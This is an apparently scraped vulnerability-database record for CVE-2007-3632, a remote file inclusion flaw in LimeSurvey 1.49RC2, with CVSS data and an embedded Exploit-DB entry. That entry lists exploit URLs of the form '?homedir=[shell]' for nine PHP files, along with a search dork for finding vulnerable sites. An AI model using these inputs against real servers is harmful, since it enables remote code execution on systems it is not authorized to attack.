ID LIMESURVEY_INCLUDE
Type canvas
Reporter Immunity Canvas
Modified 2007-07-10T00:30:00
Description
Name| limesurvey_include
---|---
CVE| CVE-2007-3632
Exploit Pack| CANVAS
Description| LimeSurvey Include
Notes| CVSS: 6.8
Repeatability: Infinite
VENDOR: Limesurvey.org
CVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3632
CVE Name: CVE-2007-3632
{"enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-3632"]}, {"type": "exploitdb", "idList": ["EDB-ID:4156"]}], "modified": "2019-05-29T17:19:23", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2019-05-29T17:19:23", "rev": 2}, "vulnersScore": 7.1}, "reporter": "Immunity Canvas", "id": "LIMESURVEY_INCLUDE", "modified": "2007-07-10T00:30:00", "published": "2007-07-10T00:30:00", "bulletinFamily": "exploit", "viewCount": 5, "cvelist": ["CVE-2007-3632"], "type": "canvas", "references": [], "description": "**Name**| limesurvey_include \n---|--- \n**CVE**| CVE-2007-3632 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| LimeSurvey Include \n**Notes**| CVSS: 6.8 \nRepeatability: Infinite \nVENDOR: Limesurvey.org \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3632 \nCVE Name: CVE-2007-3632 \n\n", "title": "Immunity Canvas: LIMESURVEY_INCLUDE", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/limesurvey_include", "lastseen": "2019-05-29T17:19:23", "edition": 2, "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "scheme": null}
{"cve": [{"lastseen": "2021-02-02T05:31:24", "description": "Multiple PHP remote file inclusion vulnerabilities in LimeSurvey (aka PHPSurveyor) 1.49RC2 allow remote attackers to execute arbitrary PHP code via a URL in the homedir parameter to (1) OLE/PPS/File.php, (2) OLE/PPS/Root.php, (3) Spreadsheet/Excel/Writer.php, or (4) OLE/PPS.php in admin/classes/pear/; or (5) Worksheet.php, (6) Parser.php, (7) Workbook.php, (8) Format.php, or (9) BIFFwriter.php in admin/classes/pear/Spreadsheet/Excel/Writer/.", "edition": 4, "cvss3": {}, "published": "2007-07-10T00:30:00", "title": "CVE-2007-3632", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-3632"], "modified": "2017-09-29T01:29:00", "cpe": ["cpe:/a:limesurvey:limesurvey:1.49_rc2"], "id": "CVE-2007-3632", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-3632", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:limesurvey:limesurvey:1.49_rc2:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-01-31T20:16:45", "description": "LimeSurvey (PHPSurveyor) 1.49RC2 Remote File Inclusion Vulnerability. CVE-2007-3632. Webapps exploit for php platform", "published": "2007-07-06T00:00:00", "type": "exploitdb", "title": "limesurvey phpsurveyor 1.49rc2 - Remote File Inclusion Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-3632"], "modified": "2007-07-06T00:00:00", "id": "EDB-ID:4156", "href": "https://www.exploit-db.com/exploits/4156/", "sourceData": "## Owner : Pr0T3cT10n\n## Email : Pr0T3cT10n@Gmail.Com\n## Homepage : www.kamikaz-team.com\n## Script site : www.limesurvey.org\n## Script name : LimeSurvey (PHPSurveyor)\n## Version : 1.49RC2\n## Type : RFI(Remote File Include)\n## Source : http://sourceforge.net/project/showfiles.php?group_id=74605\n## D0rk : \"You have not provided a survey identification number\"\n\n## Bug :\n\t## Files :\n\t\t## /admin/classes/pear/OLE/PPS/File.php\n\t\t## /admin/classes/pear/OLE/PPS/Root.php\n\t\t## /admin/classes/pear/Spreadsheet/Excel/Writer.php\n\t\t## /admin/classes/pear/OLE/PPS.php\n\t\t## /admin/classes/pear/Spreadsheet/Excel/Writer/Worksheet.php\n\t\t## /admin/classes/pear/Spreadsheet/Excel/Writer/Parser.php\n\t\t## /admin/classes/pear/Spreadsheet/Excel/Writer/Workbook.php\n\t\t## /admin/classes/pear/Spreadsheet/Excel/Writer/Format.php\n\t\t## /admin/classes/pear/Spreadsheet/Excel/Writer/BIFFwriter.php\n\n## Exploit :\n\t\t## /admin/classes/pear/OLE/PPS/File.php?homedir=[shell]\n\t\t## /admin/classes/pear/OLE/PPS/Root.php?homedir=[shell]\n\t\t## /admin/classes/pear/Spreadsheet/Excel/Writer.php?homedir=[shell]\n\t\t## /admin/classes/pear/OLE/PPS.php?homedir=[shell]\n\t\t## /admin/classes/pear/Spreadsheet/Excel/Writer/Worksheet.php?homedir=[shell]\n\t\t## /admin/classes/pear/Spreadsheet/Excel/Writer/Parser.php?homedir=[shell]\n\t\t## /admin/classes/pear/Spreadsheet/Excel/Writer/Workbook.php?homedir=[shell]\n\t\t## /admin/classes/pear/Spreadsheet/Excel/Writer/Format.php?homedir=[shell]\n\t\t## /admin/classes/pear/Spreadsheet/Excel/Writer/BIFFwriter.php?homedir=[shell]\n\t\t\n## Thanks : str0ke\n\n# milw0rm.com [2007-07-06]\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/4156/"}]}
